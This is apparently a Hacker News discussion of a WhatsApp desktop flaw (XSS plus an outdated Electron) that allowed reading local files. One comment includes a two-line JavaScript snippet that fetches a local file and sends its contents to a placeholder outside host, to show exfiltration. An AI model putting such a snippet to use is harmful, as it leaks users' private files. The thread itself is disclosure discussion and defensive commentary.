
I found a WhatsApp security flaw that allowed hackers to read the file system - ccmpx
https://www.perimeterx.com/tech-blog/2020/whatsapp-fs-read-vuln-disclosure/
======
oarsinsync
> If you're going to use Electron, you HAVE to make sure it is updated with
> each update of Chromium.

I never really thought about this, but in retrospect, this is so blindingly
obvious, and is almost certainly a potential exploit vector to a wide range of
electron-based apps.

~~~
lima
It sure is. This is why Chrome apps and progressive web apps are great - they
share the Chrome runtime and inherit its hardening, security properties and
updates.

Many Electron apps should just be a PWA instead, and many actually are. Why
would I want to install a desktop app for WhatsApp? It runs just fine in
Chrome, and using More Tools -> Create shortcut..., you can even create a
launcher entry that will launch the page in its own window.

~~~
vbezhenar
How do I build an installer for a Chrome PWA? Like, if the user does not have
Chrome, it should install it. Also I don't want to bother the user with that
implicitly installed Chrome, so it should not add shortcuts, etc. and just live
as an app launcher.

~~~
onei
Turns out a PWA works in Firefox too [1] so I'm not sure it's entirely
necessary to force a user to install a browser just for your app. Edge is/will
be chromium, so I guess Safari is the only major browser to worry about?

[1] https://blog.mozilla.org/firefox/progressive-web-apps-whats-big-deal/

------
dep_b
Skype, Slack and WhatsApp are using 250MB each on my machine to do something
that was already possible on my 64MB RAM machine 20 years ago. And on top of
that they're running one of the most easily hackable runtimes ever. Sure, it's
fun to mess a bit with a website and remove nag screens here and there, but for
an application that is expected to have a trusted encryption system it's just
ridiculous.

I hope the pendulum swings back again and we'll see companies start to use
cross-platform Rust libraries in some kind of way. I can't imagine you can't
reuse 80% of the code that powers those applications in any other way than
using some kind of Javascript engine. And perhaps we can just compile it to
web using webassembly?

------
voicedYoda
I'm strongly opposed to apps that are just wrappers for web services. I don't
need a wrapper when I could just open a browser I trust to patch its
vulnerabilities (nod to Firefox). Every Electron app eats so much RAM, it's
stupid. And in the end, I'm just using a browser making API calls, so why do I
need the wrapper?

~~~
vojta_letal
I thought so as well - up until yesterday, when I tried the desktop version of
Microsoft Outlook. Such an awful experience. Just trying to pick an available
meeting room was surprisingly more difficult than on the modern web. And I can
hardly see how even Microsoft could bring the web experience to desktop in the
future without somehow leveraging the existing online version.

~~~
alxlaz
> I tried desktop version of Microsoft Outlook. Such an awful experience. Just
> trying to pick an available meeting room was surprisingly more difficult
> than on the modern web.

That has nothing to do with Electron. You can totally bork a UI on the
"modern web", too. There's nothing stopping the Outlook team from porting the
old room-picking interface to the web version.

I've only used the Outlook web app as a fallback (at $work it used to be
available using 2FA, and I'd use it if I needed to check my email real quick
but didn't have my laptop -- and, thus, "real" Outlook -- with me) so maybe
it's an exception. But most of the time I really wish people would stop trying
to bring the web experience to desktop :).

------
dmurray
He didn't really demonstrate how "hackers" could read the file system, right?
The screenshot of etc/hosts is on the same computer where that hosts file
lives.

> There are more than 5 different 1-day RCEs in Chromium 69 or higher, you
> just need to find a published one and use it through the persistent XSS
> found earlier and BAM: Remote Code Execution ACHIEVED!

> I did not take the time to actually exploit a public RCE

The XSS vulnerability is serious and looks fully deserving of a bug bounty.
Likewise, using an old version of Electron is asking for trouble. But for me
this PoC should include the extra step of "just" exploiting one of the RCE
holes he's sure must exist.

~~~
JoshTriplett
> He didn't really demonstrate how "hackers" could read the file system,
> right? The screenshot of etc/hosts is on the same computer where that hosts
> file lives.

If you can fetch arbitrary URLs, and the contents of local files, you can
trivially exfiltrate the latter with the former. Just fetch the local file,
then fetch an URL that encodes the contents of the local file.

    // fetch() is asynchronous, so the body has to be awaited before it can be
    // put into the outbound URL; encodeURIComponent() makes it URL-safe
    const text = await (await fetch("/local/secret/file")).text();
    await fetch("https://example.org/" + encodeURIComponent(text));

~~~
dmurray
Yes, that's right of course, I had missed that he almost certainly can request
arbitrary remote URLs.

------
fouc
Is there a good way to identify all Electron apps installed on my computer?

~~~
guessmyname
(macOS) Use this command to list all applications with Electron as a
dependency:

    ls -1d -- /Applications/*.app/Contents/Frameworks/Electron\ Framework.framework

(linux) You can also search for any folder called "app.asar" or
"app.asar.unpacked"

(windows) You can also reverse the process used to package an app:
https://www.electronjs.org/docs/tutorial/application-distribution

~~~
PappaPatat
Guess this is typical for a lot of us:

/Applications/Discord.app/Contents/Frameworks/Electron Framework.framework
/Applications/Etcher.app/Contents/Frameworks/Electron Framework.framework
/Applications/Twitch.app/Contents/Frameworks/Electron Framework.framework

~~~
fouc
DueFocus.app Keybase.app Marp.app Mullvad VPN.app Postman.app Skype.app
Slack.app Visual Studio Code.app WhatsApp.app

------
kjaftaedi
Very nice work! Also curious what kind of bounty was paid out for this.

~~~
luckydata
half of Jeff Bezos' net worth.

~~~
yoz-y
Important to note that this flaw only affects the desktop version of WhatsApp.
Which is not what Bezos was using.

~~~
bitL
There was (is?) obviously an issue with mobile WhatsApp and local file access
(perhaps different in nature to desktop one) and the joke was just too good.

------
wiredfool
Wonder what other electron apps have issues like this, or at least did until
they quickly updated their electron version.

~~~
projectdelphai
Just checked my discord client right now and it's using Chrome 69 through
Electron 4.0.8. Haven't had a chance to check a desktop version of Slack yet.

------
Dinux
I'm a heavy WhatsApp user and I feel like WhatsApp has gone downhill ever
since Facebook took over. Performance is down significantly, I experience a
lot more visible bugs, more and more exploits are being revealed about
seemingly trivial components (file encryption, browser XSS), and useless
features are being added. It's not like WhatsApp Inc. was flawless before they
got acquired, but at least it worked well and most of the developers
_actually_ wanted to make a great chat app.

It's just a matter of time before Facebook merges WhatsApp with its Messenger
(and keeps either of those names).

~~~
Stubb
Signal and Telegram are both solid alternatives built around different
security models. When I get a notification in Messenger, Instagram, etc., I
simply reply back with my contact info for those apps. Telegram gives you a
vanity URL using your username, which is pretty cool.

~~~
Dinux
Yes I am using Signal. It's just that most people around me are not on Signal.
Trying to convince them to switch is useless (although I try). WhatsApp is not
my first choice either.

~~~
_jal
Tell them no.

My perspective is, pick one of the many overlapping channels we already share
or don't bother me. I am not signing up to yet another spyware-of-the-month
app in order to chase your fashion sense.

~~~
meowface
They would say the same of you, from their perspective. It's like someone
asking you for your Twitter and you replying that you only use Mastodon.

~~~
_jal
If I only used Mastodon or some other low-user-count service, you would have a
point. Instead, what I said was,

> pick one of the many overlapping channels we already share

~~~
meowface
True. I think I was somewhat conflating your post with the parent's.

------
everlost
Does anyone know if this was the vulnerability used to hack into Bezos' phone?

------
h1fra
wow, testing for `alert()` in a javascript environment is like the first thing
you learn. Feels bad for whatsapp engineers :/

~~~
pfundstein
These flaws are such basic security 101 issues, I hate to think how many more
better hidden issues exist.

------
imvetri
TLDR: 1. Altering the text of someone else's reply. 2. Altering the banner image
of someone else's reply containing links. 3, 4, 5. Good.

------
kome
i'm starting to think that Durov was right after all...

------
mrnobody_67
This is probably how the Saudis got the data off Jeff's phone...

~~~
boring_twenties
You think Bezos was running the desktop/Electron app on his phone?

~~~
Dinux
He could have used the OSX desktop app. But the Bezos thing seems to be
unrelated (as far as I can tell).

------
akerro
How come WhatsApp has so many security flaws recently and Signal isn't
affected? This cannot be a coincidence, right? Signal has fewer people working
on it, no massive corporation behind the product, more people as smart as Moxie
working on it. I don't believe these flaws are just bugs... Right?

~~~
bhaavan
What is the basis of the assertion that "Signal isn't affected"? Do you track
CVEs for Signal?

